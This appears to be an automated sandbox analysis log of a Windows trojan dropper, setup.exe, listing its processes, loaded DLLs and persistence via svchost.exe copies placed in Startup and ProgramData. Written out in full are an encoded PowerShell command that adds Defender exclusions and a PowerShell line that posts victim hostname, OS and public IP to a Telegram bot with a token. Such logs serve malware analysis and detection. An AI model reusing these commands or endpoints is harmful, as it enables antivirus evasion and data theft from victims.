Source: C:\ProgramData\svchost\svchost.exe; Code function: 10_2_00401180 GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess (10_2_00401180)
Source: C:\ProgramData\svchost\svchost.exe; Code function: 10_2_00401200 GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess (10_2_00401200)
Source: C:\ProgramData\svchost\svchost.exe; Code function: 18_2_00401090 GetModuleHandleA,GetProcAddress,GetCurrentThread,NtSetInformationThread (18_2_00401090)
Source: C:\ProgramData\svchost\svchost.exe; Code function: 18_2_00401100 GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess (18_2_00401100)
Source: C:\Users\user\AppData\Local\Temp\svchost.exe; Code function: 3_2_00007FF669AAB8F0: CreateFileW,CloseHandle,wcscpy,wcscpy,wcscpy,wcscpy,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn (3_2_00007FF669AAB8F0)
Source: C:\Windows\System32\svchost.exe; File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 3_2_00007FF669AD81C03_2_00007FF669AD81C0
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 3_2_00007FF669AC31B43_2_00007FF669AC31B4
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 3_2_00007FF669ABB4D43_2_00007FF669ABB4D4
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 3_2_00007FF669AE14903_2_00007FF669AE1490
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 3_2_00007FF669AC44343_2_00007FF669AC4434
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 3_2_00007FF669AC86B03_2_00007FF669AC86B0
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 3_2_00007FF669ACFFF03_2_00007FF669ACFFF0
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 3_2_00007FF669AB06883_2_00007FF669AB0688
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 3_2_00007FF669AC25703_2_00007FF669AC2570
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 3_2_00007FF669AA75503_2_00007FF669AA7550
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 3_2_00007FF669ABC5403_2_00007FF669ABC540
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 3_2_00007FF669AAB8F03_2_00007FF669AAB8F0
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 3_2_00007FF669ABA8683_2_00007FF669ABA868
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 3_2_00007FF669AAC8243_2_00007FF669AAC824
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 3_2_00007FF669ABE76C3_2_00007FF669ABE76C
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 3_2_00007FF669ADB7783_2_00007FF669ADB778
        Source: C:\Users\user\AppData\Local\Temp\tg.exeCode function: 4_2_0040C8984_2_0040C898
        Source: C:\Users\user\AppData\Local\Temp\tg.exeCode function: 4_2_0040E9504_2_0040E950
        Source: C:\Users\user\AppData\Local\Temp\tg.exeCode function: 4_2_004109104_2_00410910
        Source: C:\Users\user\AppData\Local\Temp\tg.exeCode function: 4_2_004109D94_2_004109D9
        Source: C:\Users\user\AppData\Local\Temp\tg.exeCode function: 4_2_004105E04_2_004105E0
        Source: C:\Users\user\AppData\Local\Temp\tg.exeCode function: 4_2_004115804_2_00411580
        Source: C:\Users\user\AppData\Local\Temp\tg.exeCode function: 4_2_004109934_2_00410993
        Source: C:\Users\user\AppData\Local\Temp\tg.exeCode function: 4_2_004106004_2_00410600
        Source: C:\Users\user\AppData\Local\Temp\tg.exeCode function: 4_2_0040B3474_2_0040B347
        Source: C:\Users\user\AppData\Local\Temp\tg.exeCode function: 4_2_0040F3C84_2_0040F3C8
        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exeCode function: 7_2_0040D7F07_2_0040D7F0
        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exeCode function: 7_2_004068207_2_00406820
        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exeCode function: 7_2_004094F07_2_004094F0
        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exeCode function: 7_2_004194967_2_00419496
        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exeCode function: 7_2_004185547_2_00418554
        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exeCode function: 7_2_0040CD207_2_0040CD20
        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exeCode function: 7_2_004179277_2_00417927
        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exeCode function: 7_2_00406DE07_2_00406DE0
        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exeCode function: 7_2_00417E787_2_00417E78
        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exeCode function: 7_2_00419ABC7_2_00419ABC
        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exeCode function: 7_2_0040CF4A7_2_0040CF4A
        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exeCode function: 7_2_004173D67_2_004173D6
        Source: C:\ProgramData\svchost\svchost.exeCode function: 10_2_0040682010_2_00406820
        Source: C:\ProgramData\svchost\svchost.exeCode function: 10_2_0041792710_2_00417927
        Source: C:\ProgramData\svchost\svchost.exeCode function: 10_2_00419ABC10_2_00419ABC
        Source: C:\ProgramData\svchost\svchost.exeCode function: 10_2_004173D610_2_004173D6
        Source: C:\ProgramData\svchost\svchost.exeCode function: 10_2_004094F010_2_004094F0
        Source: C:\ProgramData\svchost\svchost.exeCode function: 10_2_0041949610_2_00419496
        Source: C:\ProgramData\svchost\svchost.exeCode function: 10_2_0041855410_2_00418554
        Source: C:\ProgramData\svchost\svchost.exeCode function: 10_2_0040CD2010_2_0040CD20
        Source: C:\ProgramData\svchost\svchost.exeCode function: 10_2_00406DE010_2_00406DE0
        Source: C:\ProgramData\svchost\svchost.exeCode function: 10_2_00417E7810_2_00417E78
        Source: C:\ProgramData\svchost\svchost.exeCode function: 10_2_0040CF4A10_2_0040CF4A
        Source: C:\ProgramData\svchost\svchost.exeCode function: 10_2_0040D7F010_2_0040D7F0
        Source: C:\ProgramData\svchost\svchost.exeCode function: 18_2_0040682018_2_00406820
        Source: C:\ProgramData\svchost\svchost.exeCode function: 18_2_004094F018_2_004094F0
        Source: C:\ProgramData\svchost\svchost.exeCode function: 18_2_0041949618_2_00419496
        Source: C:\ProgramData\svchost\svchost.exeCode function: 18_2_0041855418_2_00418554
        Source: C:\ProgramData\svchost\svchost.exeCode function: 18_2_0040CD2018_2_0040CD20
        Source: C:\ProgramData\svchost\svchost.exeCode function: 18_2_0041792718_2_00417927
        Source: C:\ProgramData\svchost\svchost.exeCode function: 18_2_00406DE018_2_00406DE0
        Source: C:\ProgramData\svchost\svchost.exeCode function: 18_2_00417E7818_2_00417E78
        Source: C:\ProgramData\svchost\svchost.exeCode function: 18_2_00419ABC18_2_00419ABC
        Source: C:\ProgramData\svchost\svchost.exeCode function: 18_2_0040CF4A18_2_0040CF4A
        Source: C:\ProgramData\svchost\svchost.exeCode function: 18_2_004173D618_2_004173D6
        Source: C:\ProgramData\svchost\svchost.exeCode function: 18_2_0040D7F018_2_0040D7F0
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FFD9BAAE18523_2_00007FFD9BAAE185
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FFD9BAAE0FC23_2_00007FFD9BAAE0FC
        Source: C:\ProgramData\svchost\svchost.exeCode function: String function: 00412140 appears 38 times
        Source: client.exe.0.drStatic PE information: Resource name: RT_VERSION type: Intel ia64 COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
        Source: client.exe.0.drStatic PE information: Number of sections : 12 > 10
        Source: setup.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
        Source: classification engineClassification label: mal100.troj.adwa.spyw.evad.winEXE@42/28@2/3
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 3_2_00007FF669AAAE3C GetLastError,FormatMessageW,LocalFree,3_2_00007FF669AAAE3C
        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exeCode function: 7_2_0040D490 CoInitializeEx,CoCreateInstance,GetFileAttributesW,_wcsrchr,SetFileAttributesW,CoUninitialize,7_2_0040D490
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 3_2_00007FF669AC7EC8 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipAlloc,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,3_2_00007FF669AC7EC8
        Source: C:\Windows\System32\cmd.exe | File created: C:\Users\user\AppData\Roaming\System
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7184:120:WilError_03
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3652:120:WilError_03
        Source: C:\ProgramData\svchost\svchost.exe | Mutant created: \Sessions\1\BaseNamedObjects\cC0inHj
        Source: C:\Users\user\Desktop\setup.exe | File created: C:\Users\user\AppData\Local\Temp\svchost.exe
        Source: C:\Users\user\AppData\Local\Temp\tg.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1BBA.tmp\1BBB.tmp\1BBC.bat C:\Users\user\AppData\Local\Temp\tg.exe"
        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exe | Command line argument: --run | 7_2_0040DEB0
        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exe | Command line argument: --config | 7_2_0040DEB0
        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exe | Command line argument: --check | 7_2_0040DEB0
        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exe | Command line argument: --config | 7_2_0040DEB0
        Source: C:\ProgramData\svchost\svchost.exe | Command line argument: --run | 10_2_0040DEB0
        Source: C:\ProgramData\svchost\svchost.exe | Command line argument: --config | 10_2_0040DEB0
        Source: C:\ProgramData\svchost\svchost.exe | Command line argument: --check | 10_2_0040DEB0
        Source: C:\ProgramData\svchost\svchost.exe | Command line argument: --config | 10_2_0040DEB0
        Source: C:\ProgramData\svchost\svchost.exe | Command line argument: --run | 18_2_0040DEB0
        Source: C:\ProgramData\svchost\svchost.exe | Command line argument: --config | 18_2_0040DEB0
        Source: C:\ProgramData\svchost\svchost.exe | Command line argument: --check | 18_2_0040DEB0
        Source: C:\ProgramData\svchost\svchost.exe | Command line argument: --config | 18_2_0040DEB0
        Source: setup.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\AppData\Local\Temp\client.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
        Source: C:\Users\user\AppData\Local\Temp\client.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
        Source: C:\Users\user\Desktop\setup.exe | File read: C:\Users\user\Desktop\desktop.ini
        Source: C:\Users\user\Desktop\setup.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: setup.exe | Virustotal: Detection: 61%
        Source: setup.exe | ReversingLabs: Detection: 63%
        Source: unknown | Process created: C:\Users\user\Desktop\setup.exe "C:\Users\user\Desktop\setup.exe"
        Source: C:\Users\user\Desktop\setup.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAeQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGcAbgBwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHUAZQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAZABmACMAPgA="
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\setup.exe | Process created: C:\Users\user\AppData\Local\Temp\svchost.exe "C:\Users\user\AppData\Local\Temp\svchost.exe"
        Source: C:\Users\user\Desktop\setup.exe | Process created: C:\Users\user\AppData\Local\Temp\tg.exe "C:\Users\user\AppData\Local\Temp\tg.exe"
        Source: C:\Users\user\AppData\Local\Temp\tg.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1BBA.tmp\1BBB.tmp\1BBC.bat C:\Users\user\AppData\Local\Temp\tg.exe"
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Process created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exe"
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -Command "(Get-Date).ToString('yyyy-MM-dd HH:mm:ss')"
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "(Get-Date).ToString('yyyy-MM-dd HH:mm:ss')"
        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exe | Process created: C:\ProgramData\svchost\svchost.exe "C:\ProgramData\svchost\svchost.exe" --run
        Source: C:\Users\user\Desktop\setup.exe | Process created: C:\Users\user\AppData\Local\Temp\client.exe "C:\Users\user\AppData\Local\Temp\client.exe"
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -Command "(Invoke-RestMethod -Uri 'https://api.ipify.org?format=text')"
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "(Invoke-RestMethod -Uri 'https://api.ipify.org?format=text')"
        Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -Command "$env:COMPUTERNAME"
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$env:COMPUTERNAME"
        Source: unknown | Process created: C:\ProgramData\svchost\svchost.exe "C:\ProgramData\svchost\svchost.exe" --run
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -Command "[System.Environment]::OSVersion"
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "[System.Environment]::OSVersion"
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -Command "if ([System.IntPtr]::Size -eq 8) { '64-bit' } else { '32-bit' }"
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "if ([System.IntPtr]::Size -eq 8) { '64-bit' } else { '32-bit' }"
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-RestMethod -Uri 'https://api.telegram.org/bot7879910740:AAEmpll82MOqQk9TxWSC5yK5UZ56ixr0bZQ/sendMessage' -Method POST -Body @{chat_id='6734985705' ; text=' @New Device Infected!!!, Information: Date: 2024-12-22 19:05:51, Hostname: user-PC, OS: Win32NT 10.0.19045.0 Microsoft Windows NT 10.0.19045.0, Architecture: 64-bit, Public IP: 8.46.123.189'}"
        Source: C:\Users\user\Desktop\setup.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAeQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGcAbgBwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHUAZQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAZABmACMAPgA="
        Source: C:\Users\user\Desktop\setup.exe | Process created: C:\Users\user\AppData\Local\Temp\svchost.exe "C:\Users\user\AppData\Local\Temp\svchost.exe"
        Source: C:\Users\user\Desktop\setup.exe | Process created: C:\Users\user\AppData\Local\Temp\tg.exe "C:\Users\user\AppData\Local\Temp\tg.exe"
        Source: C:\Users\user\Desktop\setup.exe | Process created: C:\Users\user\AppData\Local\Temp\client.exe "C:\Users\user\AppData\Local\Temp\client.exe"
        Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Process created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exe"
        Source: C:\Users\user\AppData\Local\Temp\tg.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1BBA.tmp\1BBB.tmp\1BBC.bat C:\Users\user\AppData\Local\Temp\tg.exe"
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -Command "(Get-Date).ToString('yyyy-MM-dd HH:mm:ss')"
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -Command "(Invoke-RestMethod -Uri 'https://api.ipify.org?format=text')"
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -Command "$env:COMPUTERNAME"
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -Command "[System.Environment]::OSVersion"
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -Command "if ([System.IntPtr]::Size -eq 8) { '64-bit' } else { '32-bit' }"
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-RestMethod -Uri 'https://api.telegram.org/bot7879910740:AAEmpll82MOqQk9TxWSC5yK5UZ56ixr0bZQ/sendMessage' -Method POST -Body @{chat_id='6734985705' ; text=' @New Device Infected!!!, Information: Date: 2024-12-22 19:05:51, Hostname: user-PC, OS: Win32NT 10.0.19045.0 Microsoft Windows NT 10.0.19045.0, Architecture: 64-bit, Public IP: 8.46.123.189'}"
        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exe | Process created: C:\ProgramData\svchost\svchost.exe "C:\ProgramData\svchost\svchost.exe" --run
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "(Get-Date).ToString('yyyy-MM-dd HH:mm:ss')"
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "(Invoke-RestMethod -Uri 'https://api.ipify.org?format=text')"
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$env:COMPUTERNAME"
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "[System.Environment]::OSVersion"
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "if ([System.IntPtr]::Size -eq 8) { '64-bit' } else { '32-bit' }"
        Source: C:\Users\user\Desktop\setup.exe | Section loaded: apphelp.dll
        Source: C:\Users\user\Desktop\setup.exe | Section loaded: acgenral.dll
        Source: C:\Users\user\Desktop\setup.exe | Section loaded: uxtheme.dll
        Source: C:\Users\user\Desktop\setup.exe | Section loaded: winmm.dll
        Source: C:\Users\user\Desktop\setup.exe | Section loaded: samcli.dll
        Source: C:\Users\user\Desktop\setup.exe | Section loaded: msacm32.dll
        Source: C:\Users\user\Desktop\setup.exe | Section loaded: version.dll
        Source: C:\Users\user\Desktop\setup.exe | Section loaded: userenv.dll
        Source: C:\Users\user\Desktop\setup.exe | Section loaded: dwmapi.dll
        Source: C:\Users\user\Desktop\setup.exe | Section loaded: urlmon.dll
        Source: C:\Users\user\Desktop\setup.exe | Section loaded: mpr.dll
        Source: C:\Users\user\Desktop\setup.exe | Section loaded: sspicli.dll
        Source: C:\Users\user\Desktop\setup.exe | Section loaded: winmmbase.dll
        Source: C:\Users\user\Desktop\setup.exe | Section loaded: winmmbase.dll
        Source: C:\Users\user\Desktop\setup.exe | Section loaded: iertutil.dll
        Source: C:\Users\user\Desktop\setup.exe | Section loaded: srvcli.dll
        Source: C:\Users\user\Desktop\setup.exe | Section loaded: netutils.dll
        Source: C:\Users\user\Desktop\setup.exe | Section loaded: windows.storage.dll
        Source: C:\Users\user\Desktop\setup.exe | Section loaded: wldp.dll
        Source: C:\Users\user\Desktop\setup.exe | Section loaded: kernel.appcore.dll
        Source: C:\Users\user\Desktop\setup.exe | Section loaded: propsys.dll
        Source: C:\Users\user\Desktop\setup.exe | Section loaded: profapi.dll
        Source: C:\Users\user\Desktop\setup.exe | Section loaded: edputil.dll
        Source: C:\Users\user\Desktop\setup.exe | Section loaded: windows.staterepositoryps.dll
        Source: C:\Users\user\Desktop\setup.exe | Section loaded: wintypes.dll
        Source: C:\Users\user\Desktop\setup.exe | Section loaded: appresolver.dll
        Source: C:\Users\user\Desktop\setup.exe | Section loaded: bcp47langs.dll
        Source: C:\Users\user\Desktop\setup.exe | Section loaded: slc.dll
        Source: C:\Users\user\Desktop\setup.exe | Section loaded: sppc.dll
        Source: C:\Users\user\Desktop\setup.exe | Section loaded: onecorecommonproxystub.dll
        Source: C:\Users\user\Desktop\setup.exe | Section loaded: onecoreuapcommonproxystub.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
        Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Section loaded: version.dll
        Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Section loaded: dxgidebug.dll
        Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Section loaded: sfc_os.dll
        Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Section loaded: sspicli.dll
        Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Section loaded: rsaenh.dll
        Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Section loaded: uxtheme.dll
        Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Section loaded: dwmapi.dll
        Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Section loaded: cryptbase.dll
        Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Section loaded: riched20.dll
        Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Section loaded: usp10.dll
        Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Section loaded: msls31.dll
        Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Section loaded: kernel.appcore.dll
        Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Section loaded: windowscodecs.dll
        Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Section loaded: textinputframework.dll
        Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Section loaded: coreuicomponents.dll
